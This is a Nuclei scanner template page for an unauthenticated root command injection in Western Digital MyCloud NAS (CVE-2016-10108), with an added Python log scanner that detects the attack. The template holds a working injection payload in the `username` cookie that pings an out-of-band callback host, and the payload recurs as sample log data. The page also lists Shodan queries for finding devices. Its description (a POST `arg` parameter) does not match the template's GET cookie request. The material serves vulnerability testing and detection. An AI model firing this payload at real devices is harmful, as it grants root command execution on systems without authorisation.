Western Digital MyCloud NAS - Command Injection
ID: CVE-2016-10108
Severity: critical
Author: DhiyaneshDk
Tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital
Description
Unauthenticated remote command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.
YAML Source
id: CVE-2016-10108

info:
  name: Western Digital MyCloud NAS - Command Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet.
  reference:
    - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10108
    - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
    - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-10108
    cwe-id: CWE-77
    epss-score: 0.86242
    epss-percentile: 0.98335
    cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: western_digital
    product: mycloud_nas
    shodan-query: http.favicon.hash:-1074357885
    fofa-query: icon_hash=-1074357885
  tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1

    matchers:
      - type: dsl
        dsl:
          - contains(body, "WDMyCloud")
          - contains(interactsh_protocol, "dns")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100f4b6a77702d1ee7085f841c3aebeb258c0053fb3ca6a147b72c862b64723328602210089343d3e86d44e5b93890ffe3b0270be0a664049c24bba787a905f5560712c48:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability by sending the request above and confirming an out-of-band DNS callback to the interactsh server (the `oast` tag). Run it against a target with the Nuclei tool:
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-10108.yaml"
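The template above confirms the flaw from the scanner's side, through an out-of-band DNS callback. On the defender's side, the same request shape is easy to spot in proxy or reverse-proxy logs: the injection rides in the `username` login cookie, and a legitimate username never contains shell metacharacters. The following Python script is an added example and is not part of the Nuclei template or the project's code; it parses constructed sample log lines (the log format, the client addresses and the `oast.example.invalid` callback host are all assumptions) and flags requests whose `username` cookie carries `|`, backticks, `;`, `$`, `&` or similar characters, after percent-decoding so that encoded forms are not missed.

```python
import re
from urllib.parse import unquote

# Shell metacharacters that have no place in a login cookie value. Any one of
# them in the `username` cookie is a strong indicator of a CWE-77 injection attempt.
SHELL_META = re.compile(r"[|;&`$(){}<>\n]")

# Constructed sample of proxy request logs (assumed format):
#   "<client> <method> <path> cookie=<Cookie header>"
SAMPLE_LOG = """\
203.0.113.5 GET / cookie=isAdmin=1; username=admin; local_login=1
203.0.113.9 GET / cookie=isAdmin=1; username=admin|echo%20`ping -c 3 oast.example.invalid`; local_login=1
198.51.100.7 GET /web/google_analytics.php cookie=username=alice; local_login=1
"""

LINE_RE = re.compile(r"^(?P<client>\S+) (?P<method>\S+) (?P<path>\S+) cookie=(?P<cookie>.*)$")


def parse_cookie(header):
    """Split a Cookie header into a dict, percent-decoding each value so that
    encoded metacharacters (e.g. %7C for '|') are inspected in decoded form."""
    cookies = {}
    for part in header.split(";"):
        if "=" not in part:
            continue
        name, _, value = part.strip().partition("=")
        cookies[name.strip()] = unquote(value)
    return cookies


def is_injection_attempt(cookies):
    """True when the `username` cookie contains shell metacharacters."""
    return bool(SHELL_META.search(cookies.get("username", "")))


def scan_log(text):
    """Return (client, path, decoded username) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # skip lines that do not fit the assumed log format
        cookies = parse_cookie(match.group("cookie"))
        if is_injection_attempt(cookies):
            hits.append((match.group("client"), match.group("path"), cookies["username"]))
    return hits


if __name__ == "__main__":
    for client, path, username in scan_log(SAMPLE_LOG):
        print(f"ALERT client={client} path={path} username={username!r}")
```

Only the second sample line is flagged; the decoded username shows the injected `|` and backtick sequence. Pair a detection like this with the remediation the template states: update the firmware and keep the device off the public internet, since the check is unauthenticated and a single request is enough.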